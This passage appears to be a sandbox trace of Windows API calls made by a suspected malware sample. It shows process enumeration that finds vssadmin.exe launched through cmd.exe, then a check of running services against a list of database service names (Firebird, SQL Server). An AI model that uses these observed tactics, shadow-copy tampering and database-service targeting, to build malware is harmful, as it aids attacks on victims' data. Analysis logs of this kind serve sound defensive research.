cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.567] lstrlenW (lpString="svchost.exe") returned 11 [0310.567] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.568] lstrlenW (lpString="svchost.exe") returned 11 [0310.568] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.568] lstrlenW (lpString="svchost.exe") returned 11 [0310.568] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.569] lstrlenW (lpString="svchost.exe") returned 11 [0310.569] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.569] lstrlenW (lpString="svchost.exe") returned 11 [0310.569] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.570] lstrlenW (lpString="svchost.exe") returned 11 [0310.570] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0310.571] lstrlenW (lpString="spoolsv.exe") returned 11 [0310.571] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.571] lstrlenW (lpString="svchost.exe") returned 11 [0310.571] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0310.572] lstrlenW (lpString="audiodg.exe") returned 11 [0310.572] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0310.572] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0310.572] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0310.573] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0310.573] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0310.580] lstrlenW (lpString="Memory Compression") returned 18 [0310.580] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0310.580] lstrlenW (lpString="sihost.exe") returned 10 [0310.581] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.581] lstrlenW (lpString="svchost.exe") returned 11 [0310.581] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0310.582] lstrlenW (lpString="taskhostw.exe") returned 13 [0310.582] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0310.582] lstrlenW (lpString="explorer.exe") returned 12 [0310.582] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0310.717] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0310.717] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0310.718] lstrlenW (lpString="SearchUI.exe") returned 12 [0310.718] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0310.718] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0310.718] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0310.719] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0310.719] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0310.719] lstrlenW (lpString="wdgmug.exe") returned 10 [0310.719] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0310.720] lstrlenW (lpString="cmd.exe") returned 7 [0310.720] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0310.743] lstrlenW (lpString="conhost.exe") returned 11 [0310.743] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0310.743] lstrlenW (lpString="vssadmin.exe") returned 12 [0310.743] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0310.744] CloseHandle (hObject=0x3e4) returned 1 [0310.744] Sleep (dwMilliseconds=0x1f4) [0311.261] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a418 [0311.261] EnumServicesStatusExW (in: hSCManager=0x401a418, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0311.262] GetLastError () returned 0xea [0311.262] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c30) returned 0x4150d60 [0311.262] EnumServicesStatusExW (in: hSCManager=0x401a418, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4150d60, cbBufSize=0x1c30, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4150d60, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0311.263] CloseServiceHandle (hSCObject=0x401a418) returned 1 [0311.264] lstrlenW (lpString="Appinfo") returned 7 [0311.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0311.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0311.264] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0311.264] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0311.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0311.264] lstrlenW (lpString="AppXSvc") returned 7 [0311.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0311.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0311.264] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0311.264] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0311.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0311.265] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0311.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0311.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0311.265] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0311.265] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0311.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0311.265] lstrlenW (lpString="Audiosrv") returned 8 [0311.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0311.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0311.265] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0311.265] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0311.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0311.265] lstrlenW (lpString="BFE") returned 3 [0311.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0311.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0311.265] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0311.265] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0311.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0311.265] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0311.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0311.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0311.265] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0311.266] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0311.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0311.266] lstrlenW (lpString="CDPSvc") returned 6 [0311.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0311.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0311.266] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0311.266] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0311.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0311.266] lstrlenW (lpString="ClickToRunSvc") returned 13 [0311.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0311.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0311.266] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0311.266] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0311.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0311.266] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0311.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0311.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0311.266] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0311.266] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0311.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0311.266] lstrlenW (lpString="CryptSvc") returned 8 [0311.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0311.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0311.266] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0311.267] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0311.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0311.267] lstrlenW (lpString="DcomLaunch") returned 10 [0311.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0311.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0311.267] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0311.267] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0311.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0311.267] lstrlenW (lpString="DeviceAssociationService") returned 24 [0311.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0311.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0311.267] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0311.267] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0311.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0311.267] lstrlenW (lpString="Dhcp") returned 4 [0311.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0311.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0311.267] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0311.268] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0311.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0311.268] lstrlenW (lpString="Dnscache") returned 8 [0311.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0311.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0311.268] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0311.268] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0311.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0311.268] lstrlenW (lpString="DPS") returned 3 [0311.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0311.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0311.268] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0311.268] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0311.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0311.268] lstrlenW (lpString="DusmSvc") returned 7 [0311.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0311.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0311.268] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0311.268] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0311.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0311.269] lstrlenW (lpString="EventLog") returned 8 [0311.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0311.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0311.269] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0311.269] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0311.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0311.269] lstrlenW (lpString="EventSystem") returned 11 [0311.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0311.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0311.269] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0311.269] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0311.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0311.269] lstrlenW (lpString="FontCache") returned 9 [0311.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0311.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0311.269] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0311.269] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0311.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0311.269] lstrlenW (lpString="gpsvc") returned 5 [0311.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0311.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0311.270] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0311.270] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0311.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0311.270] lstrlenW (lpString="iphlpsvc") returned 8 [0311.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0311.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0311.270] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0311.270] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0311.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0311.270] lstrlenW (lpString="KeyIso") returned 6 [0311.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0311.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0311.270] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0311.270] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0311.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0311.270] lstrlenW (lpString="LanmanServer") returned 12 [0311.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0311.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0311.270] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0311.270] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0311.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0311.271] lstrlenW (lpString="LanmanWorkstation") returned 17 [0311.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0311.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0311.271] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0311.271] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0311.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0311.271] lstrlenW (lpString="lfsvc") returned 5 [0311.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0311.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0311.271] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0311.271] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0311.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0311.271] lstrlenW (lpString="lmhosts") returned 7 [0311.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0311.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0311.271] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0311.271] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0311.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0311.271] lstrlenW (lpString="LSM") returned 3 [0311.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0311.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0311.271] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0311.271] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0311.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0311.272] lstrlenW (lpString="MpsSvc") returned 6 [0311.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0311.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0311.272] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0311.272] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0311.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0311.272] lstrlenW (lpString="NcbService") returned 10 [0311.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0311.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0311.272] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0311.272] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0311.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0311.272] lstrlenW (lpString="netprofm") returned 8 [0311.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0311.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0311.272] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0311.272] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0311.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0311.272] lstrlenW (lpString="NgcSvc") returned 6 [0311.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0311.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0311.272] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0311.272] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0311.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0311.272] lstrlenW (lpString="NlaSvc") returned 6 [0311.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0311.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0311.273] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0311.273] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0311.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0311.273] lstrlenW (lpString="nsi") returned 3 [0311.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0311.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0311.273] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0311.273] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0311.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0311.275] lstrlenW (lpString="PcaSvc") returned 6 [0311.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0311.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0311.276] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0311.276] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0311.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0311.276] lstrlenW 